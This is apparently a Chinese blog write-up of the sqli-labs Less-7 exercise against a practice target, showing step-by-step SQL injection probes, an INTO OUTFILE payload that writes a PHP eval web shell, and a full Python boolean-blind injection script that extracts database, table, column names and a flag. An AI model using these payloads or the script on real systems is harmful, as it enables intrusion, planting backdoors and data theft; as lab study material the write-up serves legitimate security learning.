Less-7

Less-7 GET - Dump into outfile - String （导出文件GET字符型注入）

1.判断是否存在注入

https://636-a6e6c7e5-e51a-405f-9b38-2f77237b8448.do-not-trust.hacking.run/?id=1'

错误回显 => 存在注入

2.判断参数类型

https://636-a6e6c7e5-e51a-405f-9b38-2f77237b8448.do-not-trust.hacking.run/?id=1 and 1=2 --+

正确回显 => 字符型

3.进行参数闭合

https://636-a6e6c7e5-e51a-405f-9b38-2f77237b8448.do-not-trust.hacking.run/?id=1' and 1=2 --+

错误回显

https://636-a6e6c7e5-e51a-405f-9b38-2f77237b8448.do-not-trust.hacking.run/?id=1' and 1=1 --+

错误回显 => 第一位闭合正确

https://636-a6e6c7e5-e51a-405f-9b38-2f77237b8448.do-not-trust.hacking.run/?id=1')) and 1=1 --+

正确回显 => 闭合成功

4.查看这个网站后台数据库所在的表有几列

https://636-a6e6c7e5-e51a-405f-9b38-2f77237b8448.do-not-trust.hacking.run/?id=1')) order by 3 --+

正确回显

https://636-a6e6c7e5-e51a-405f-9b38-2f77237b8448.do-not-trust.hacking.run/?id=1')) order by 4 --+

错误回显 => 有3列

5.文件导出注入，webshell无法上传，所以使用布尔注入。

?id=1')) union select 1,2,'<?php @eval($_POST["123"]);?>' into outfile "//var//lib//mysql//shell.php" -–+

布尔注入借用python脚本

import requests
import time

a = time.time()


def database_name():
    a = ''
    for i in range(1, 9):
        # 48 ~ 122
        low = 48
        high = 122
        mid = int((low + high) / 2)
        while True:
            payload = "?id=1')) and ascii(substr(database(),%d,1))>%d -- 1" % (i, mid)
            r = requests.get(url=urls + payload)
            # print(urls+payload)
            if "You are in" in r.text:  # 正确则将low = mid +1,继续搜索
                low = mid + 1
                mid = int((low + high) / 2)
                continue
            else:  # 不大于，那么就是小于等于。先直接问是不是小于，如果不是那么就是等于
                payload = "?id=1')) and ascii(substr(database(),%d,1))<%d -- 1" % (i, mid)
                # 将这部分的参数提交
                r = requests.get(url=urls + payload)
                if "You are in" in r.text:  # 代表小于成立的情况
                    high = mid - 1
                    mid = int((low + high) / 2)  # 重新定位mid
                    continue
                else:  # 只有等于的情况啦
                    a = a + chr(mid)
                    break

    print('database_name:' + a)


def table_name():
    a = ''
    for i in range(1, 9):
        # 48 ~ 122
        low = 48
        high = 122
        mid = int((low + high) / 2)
        while True:
            payload = "?id=1')) and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),%d,1))>%d -- 1 " % (
            i, mid)
            r = requests.get(url=urls + payload)
            # print(urls+payload)
            if "You are in" in r.text:  # 正确则将low = mid +1,继续搜索
                low = mid + 1
                mid = int((low + high) / 2)
                continue
            else:  # 不大于，那么就是小于等于。先直接问是不是小于，如果不是那么就是等于
                payload = "?id=1')) and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),%d,1))<%d -- 1" % (
                i, mid)
                # 将这部分的参数提交
                r = requests.get(url=urls + payload)
                if "You are in" in r.text:  # 代表小于成立的情况
                    high = mid - 1
                    mid = int((low + high) / 2)  # 重新定位mid
                    continue
                else:  # 只有等于的情况啦
                    a = a + chr(mid)
                    break

    print('table_name:' + a)


def coulmn_name():
    a = ''
    for i in range(1, 9):
        # 48 ~ 122
        low = 1
        high = 128
        mid = int((low + high) / 2)
        while True:
            payload = "?id=1')) and ascii(substr((select column_name from information_schema.columns where table_name='1BP8qvFx' limit 1,1),%d,1))>%d -- 1 " % (
            i, mid)
            r = requests.get(url=urls + payload)
            # print(urls+payload)
            if "You are in" in r.text:  # 正确则将low = mid +1,继续搜索
                low = mid + 1
                mid = int((low + high) / 2)
                continue
            else:  # 不大于，那么就是小于等于。先直接问是不是小于，如果不是那么就是等于
                payload = "?id=1')) and ascii(substr((select column_name from information_schema.columns where table_name='1BP8qvFx' limit 1,1),%d,1))<%d  -- 1" % (
                i, mid)
                # 将这部分的参数提交
                r = requests.get(url=urls + payload)
                if "You are in" in r.text:  # 代表小于成立的情况
                    high = mid - 1
                    mid = int((low + high) / 2)  # 重新定位mid
                    continue
                else:  # 只有等于的情况啦
                    a = a + chr(mid)
                    break

    print('column_name:' + a)


def flag():
    a = ''
    for i in range(1, 43):
        # 48 ~ 122
        low = 1
        high = 128
        mid = int((low + high) / 2)
        while True:
            payload = "?id=1')) and ascii(substr((select flag from 1BP8qvFx limit 3,1),%d,1))>%d -- 1" % (i, mid)
            r = requests.get(url=urls + payload)
            # print(urls+payload)
            if "You are in" in r.text:  # 正确则将low = mid +1,继续搜索
                low = mid + 1
                mid = int((low + high) / 2)
                continue
            else:  # 不大于，那么就是小于等于。先直接问是不是小于，如果不是那么就是等于
                payload = "?id=1')) and ascii(substr((select flag from 1BP8qvFx limit 3,1),%d,1))<%d  -- 1" % (i, mid)
                # 将这部分的参数提交
                r = requests.get(url=urls + payload)
                if "You are in" in r.text:  # 代表小于成立的情况
                    high = mid - 1
                    mid = int((low + high) / 2)  # 重新定位mid
                    continue
                else:  # 只有等于的情况啦
                    a = a + chr(mid)
                    print(a)
                    break

    print('flag:' + a)


if __name__ == '__main__':
    urls = 'https://636-2f3d6806-1ccd-4ae6-96be-4062e1d1f155.do-not-trust.hacking.run/'
    # database_name()
    # table_name()   #//找到了数据库名就修改一下上面的代码，然后开启就行
    # coulmn_name()
    flag()

    b = time.time()
    print('折半查找法 ：Running time: %s Seconds' % (b - a))

posted @ 2022-03-21 15:51 WeQi_Blog 阅读(76) 评论(0) 收藏举报

刷新页面返回顶部